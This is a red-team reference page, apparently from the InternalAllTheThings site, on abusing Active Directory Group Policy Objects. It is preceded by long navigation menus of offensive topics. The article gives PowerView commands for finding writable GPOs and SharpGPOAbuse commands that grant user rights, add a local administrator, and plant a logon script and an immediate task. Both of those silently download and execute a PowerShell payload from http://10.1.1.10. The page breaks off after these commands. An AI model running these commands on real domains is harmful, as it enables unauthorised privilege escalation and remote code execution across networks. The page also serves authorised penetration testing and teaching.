<a href="../../cloud/aws/aws-dynamodb/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - DynamoDB
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-ec2/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - EC2
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-iam/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Identity &amp; Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-ioc-detection/" class="md-nav__link">
<span class="md-ellipsis">
AWS - IOC &amp; Detections
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-lambda/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Lambda &amp; API Gateway
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-metadata/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Metadata SSRF
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-s3-bucket/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - S3 Buckets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-ssm/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - SSM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-training/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Training
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2" >
<label class="md-nav__link" for="__nav_4_2" id="__nav_4_2_label" tabindex="0">
<span class="md-ellipsis">
Azure
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_2">
<span class="md-nav__icon md-icon"></span>
Azure
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cloud/azure/aka-ms/" class="md-nav__link">
<span class="md-ellipsis">
aka.ms Shortcuts
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-access-and-token/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Access and Tokens
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-ad-conditional-access-policy/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Conditional Access Policy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-ad-connect/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - AD Connect and Cloud Sync
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-devices-users-sp/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - IAM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-phishing/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-requirements/" class="md-nav__link">
<span class="md-ellipsis">
Azure - Requirements
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-application-endpoint/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Endpoint
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-application-proxy/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Proxy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-container-registry/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Container Registry
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-deployment-template/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Deployment Template
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-keyvault/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - KeyVault
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-microsoft-intune/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Microsoft Intune
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-office-365/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Office 365
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-runbook/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Runbook and Automation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-storage-blob/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Storage Blob
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-virtual-machine/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Virtual Machine
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-web-apps/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Web Apps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-web-domains/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - DNS Suffix
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3" >
<label class="md-nav__link" for="__nav_4_3" id="__nav_4_3_label" tabindex="0">
<span class="md-ellipsis">
Ibm
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_3">
<span class="md-nav__icon md-icon"></span>
Ibm
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cloud/ibm/ibm-cloud-databases/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Managed Database Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/ibm/ibm-cloud-object-storage/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Object Storage
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Command control
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Command control
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../command-control/cobalt-strike-beacons/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Beacons
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../command-control/cobalt-strike-kits/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Kits
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../command-control/cobalt-strike/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../command-control/metasploit/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Containers
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Containers
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../containers/docker/" class="md-nav__link">
<span class="md-ellipsis">
Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../containers/kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Databases
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Databases
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../databases/mssql-audit-checks/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Audit Checks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../databases/mssql-command-execution/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Command Execution
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../databases/mssql-credentials/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../databases/mssql-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Database Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../databases/mssql-linked-database/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Linked Database
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
Devops
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
Devops
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../devops/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/azure-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/buildkite/" class="md-nav__link">
<span class="md-ellipsis">
BuildKite
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/circle-ci/" class="md-nav__link">
<span class="md-ellipsis">
CircleCI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/drone-ci/" class="md-nav__link">
<span class="md-ellipsis">
Drone CI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/github-actions/" class="md-nav__link">
<span class="md-ellipsis">
GitHub Actions
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
Methodology
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
Methodology
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../methodology/android-applications/" class="md-nav__link">
<span class="md-ellipsis">
Android Application
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../methodology/bug-hunting-methodology/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../methodology/source-code-analysis/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Analysis
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../methodology/vulnerability-reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
Redteam
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
Redteam
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_1" >
<label class="md-nav__link" for="__nav_10_1" id="__nav_10_1_label" tabindex="0">
<span class="md-ellipsis">
Access
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_1">
<span class="md-nav__icon md-icon"></span>
Access
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/access/html-smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/initial-access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/office-attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/phishing/" class="md-nav__link">
<span class="md-ellipsis">
Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/web-attack-surface/" class="md-nav__link">
<span class="md-ellipsis">
Web Attack Surface
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/windows-download-execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/windows-using-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_2" >
<label class="md-nav__link" for="__nav_10_2" id="__nav_10_2_label" tabindex="0">
<span class="md-ellipsis">
Escalation
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_2">
<span class="md-nav__icon md-icon"></span>
Escalation
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/escalation/linux-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/escalation/windows-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_3" >
<label class="md-nav__link" for="__nav_10_3" id="__nav_10_3_label" tabindex="0">
<span class="md-ellipsis">
Evasion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_3">
<span class="md-nav__icon md-icon"></span>
Evasion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/evasion/edr-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Endpoint Detection and Response
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/elastic-edr/" class="md-nav__link">
<span class="md-ellipsis">
Elastic EDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/linux-evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/windows-amsi-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/windows-defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/windows-dpapi/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_4" >
<label class="md-nav__link" for="__nav_10_4" id="__nav_10_4_label" tabindex="0">
<span class="md-ellipsis">
Persistence
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_4">
<span class="md-nav__icon md-icon"></span>
Persistence
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/persistence/linux-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/persistence/rdp-persistence/" class="md-nav__link">
<span class="md-ellipsis">
RDP - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/persistence/windows-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_5" >
<label class="md-nav__link" for="__nav_10_5" id="__nav_10_5_label" tabindex="0">
<span class="md-ellipsis">
Pivoting
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_5">
<span class="md-nav__icon md-icon"></span>
Pivoting
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/pivoting/network-pivoting-techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#find-vulnerable-gpo" class="md-nav__link">
<span class="md-ellipsis">
Find vulnerable GPO
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-sharpgpoabuse" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with SharpGPOAbuse
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-powergpoabuse" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with PowerGPOAbuse
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-pygpoabuse" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with pyGPOAbuse
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-powerview" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with PowerView
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#abuse-gpo-with-standin" class="md-nav__link">
<span class="md-ellipsis">
Abuse GPO with StandIn
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/active-directory/ad-adds-group-policy-objects.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/InternalAllTheThings/raw/main/docs/active-directory/ad-adds-group-policy-objects.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="active-directory-group-policy-objects">Active Directory - Group Policy Objects</h1>
<blockquote>
<p>Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner</p>
</blockquote>
<p><img alt="🚩" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/1f6a9.svg" title=":triangular_flag_on_post:" /> GPO Priorization : Organization Unit &gt; Domain &gt; Site &gt; Local</p>
<p>GPO are stored in the DC in <code>\\&lt;domain.dns&gt;\SYSVOL\&lt;domain.dns&gt;\Policies\&lt;GPOName&gt;\</code>, inside two folders <strong>User</strong> and <strong>Machine</strong>.
If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at <code>Machine\Preferences\ScheduledTasks</code>.</p>
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command: <code>gpupdate /force</code>. </p>
<h2 id="find-vulnerable-gpo">Find vulnerable GPO</h2>
<p>Look a GPLink where you have the <strong>Write</strong> right.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="nb">Get-DomainObjectAcl</span> <span class="n">-Identity</span> <span class="s2">&quot;SuperSecureGPO&quot;</span> <span class="n">-ResolveGUIDs</span> <span class="p">|</span> <span class="nb">Where-Object</span> <span class="p">{(</span><span class="nv">$_</span><span class="p">.</span><span class="n">ActiveDirectoryRights</span><span class="p">.</span><span class="n">ToString</span><span class="p">()</span> <span class="o">-match</span> <span class="s2">&quot;GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner&quot;</span><span class="p">)}</span>
</code></pre></div>
<h2 id="abuse-gpo-with-sharpgpoabuse">Abuse GPO with SharpGPOAbuse</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="c"># Build and configure SharpGPOAbuse</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="p">$</span> <span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">://</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">FSecureLABS</span><span class="p">/</span><span class="n">SharpGPOAbuse</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="p">$</span> <span class="nb">Install-Package</span> <span class="n">CommandLineParser</span> <span class="n">-Version</span> <span class="n">1</span><span class="p">.</span><span class="n">9</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">15</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="p">$</span> <span class="n">ILMerge</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">out</span><span class="p">:</span><span class="n">C</span><span class="p">:\</span><span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="n">C</span><span class="p">:\</span><span class="n">Release</span><span class="p">\</span><span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="n">C</span><span class="p">:\</span><span class="n">Release</span><span class="p">\</span><span class="n">CommandLine</span><span class="p">.</span><span class="n">dll</span>
<a id="__codelineno-1-5" name="__codelineno-1-5" href="#__codelineno-1-5"></a>
<a id="__codelineno-1-6" name="__codelineno-1-6" href="#__codelineno-1-6"></a><span class="c"># Adding User Rights</span>
<a id="__codelineno-1-7" name="__codelineno-1-7" href="#__codelineno-1-7"></a><span class="p">.\</span><span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-AddUserRights</span> <span class="p">-</span><span class="n">-UserRights</span> <span class="s2">&quot;SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight&quot;</span> <span class="p">-</span><span class="n">-UserAccount</span> <span class="n">bob</span><span class="p">.</span><span class="n">smith</span> <span class="p">-</span><span class="n">-GPOName</span> <span class="s2">&quot;Vulnerable GPO&quot;</span>
<a id="__codelineno-1-8" name="__codelineno-1-8" href="#__codelineno-1-8"></a>
<a id="__codelineno-1-9" name="__codelineno-1-9" href="#__codelineno-1-9"></a><span class="c"># Adding a Local Admin</span>
<a id="__codelineno-1-10" name="__codelineno-1-10" href="#__codelineno-1-10"></a><span class="p">.\</span><span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-AddLocalAdmin</span> <span class="p">-</span><span class="n">-UserAccount</span> <span class="n">bob</span><span class="p">.</span><span class="n">smith</span> <span class="p">-</span><span class="n">-GPOName</span> <span class="s2">&quot;Vulnerable GPO&quot;</span>
<a id="__codelineno-1-11" name="__codelineno-1-11" href="#__codelineno-1-11"></a>
<a id="__codelineno-1-12" name="__codelineno-1-12" href="#__codelineno-1-12"></a><span class="c"># Configuring a User or Computer Logon Script</span>
<a id="__codelineno-1-13" name="__codelineno-1-13" href="#__codelineno-1-13"></a><span class="p">.\</span><span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-AddUserScript</span> <span class="p">-</span><span class="n">-ScriptName</span> <span class="n">StartupScript</span><span class="p">.</span><span class="n">bat</span> <span class="p">-</span><span class="n">-ScriptContents</span> <span class="s2">&quot;powershell.exe -nop -w hidden -c \&quot;</span><span class="nb">IEX </span><span class="p">((</span><span class="nb">new-object</span> <span class="n">net</span><span class="p">.</span><span class="n">webclient</span><span class="p">).</span><span class="n">downloadstring</span><span class="p">(</span><span class="s1">&#39;http://10.1.1.10:80/a&#39;</span><span class="p">))\</span><span class="s2">&quot;&quot;</span> <span class="p">-</span><span class="n">-GPOName</span> <span class="s2">&quot;Vulnerable GPO&quot;</span>
<a id="__codelineno-1-14" name="__codelineno-1-14" href="#__codelineno-1-14"></a>
<a id="__codelineno-1-15" name="__codelineno-1-15" href="#__codelineno-1-15"></a><span class="c"># Configuring a Computer or User Immediate Task</span>
<a id="__codelineno-1-16" name="__codelineno-1-16" href="#__codelineno-1-16"></a><span class="c"># /!\ Intended to &quot;run once&quot; per GPO refresh, not run once per system</span>
<a id="__codelineno-1-17" name="__codelineno-1-17" href="#__codelineno-1-17"></a><span class="p">.\</span><span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-AddComputerTask</span> <span class="p">-</span><span class="n">-TaskName</span> <span class="s2">&quot;Update&quot;</span> <span class="p">-</span><span class="n">-Author</span> <span class="n">DOMAIN</span><span class="p">\</span><span class="n">Admin</span> <span class="p">-</span><span class="n">-Command</span> <span class="s2">&quot;cmd.exe&quot;</span> <span class="p">-</span><span class="n">-Arguments</span> <span class="s2">&quot;/c powershell.exe -nop -w hidden -c \&quot;</span><span class="nb">IEX </span><span class="p">((</span><span class="nb">new-object</span> <span class="n">net</span><span class="p">.</span><span class="n">webclient</span><span class="p">).</span><span class="n">downloadstring</span><span class="p">(</span><span class="s1">&#39;http://10.1.1.10:80/a&#39;</span><span class="p">))\</span><span class="s2">&quot;&quot;</span> <span class="p">-</span><span class="n">-GPOName</span> <span class="s2">&quot;Vulnerable GPO&quot;</span>
